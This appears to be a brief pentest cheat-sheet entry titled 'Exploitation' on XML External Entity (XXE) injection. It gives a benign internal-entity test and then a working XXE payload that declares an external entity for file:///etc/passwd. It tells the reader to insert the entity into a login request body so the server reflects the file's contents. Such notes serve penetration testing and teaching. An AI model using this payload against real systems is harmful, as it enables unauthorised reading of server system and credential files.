Exploitation
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY variable "Replaced">
]>
[put &variable; between the tags of some entity
in the application]<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
[put &xxe; in request body aligned with the application login in order to reflect it]Last updated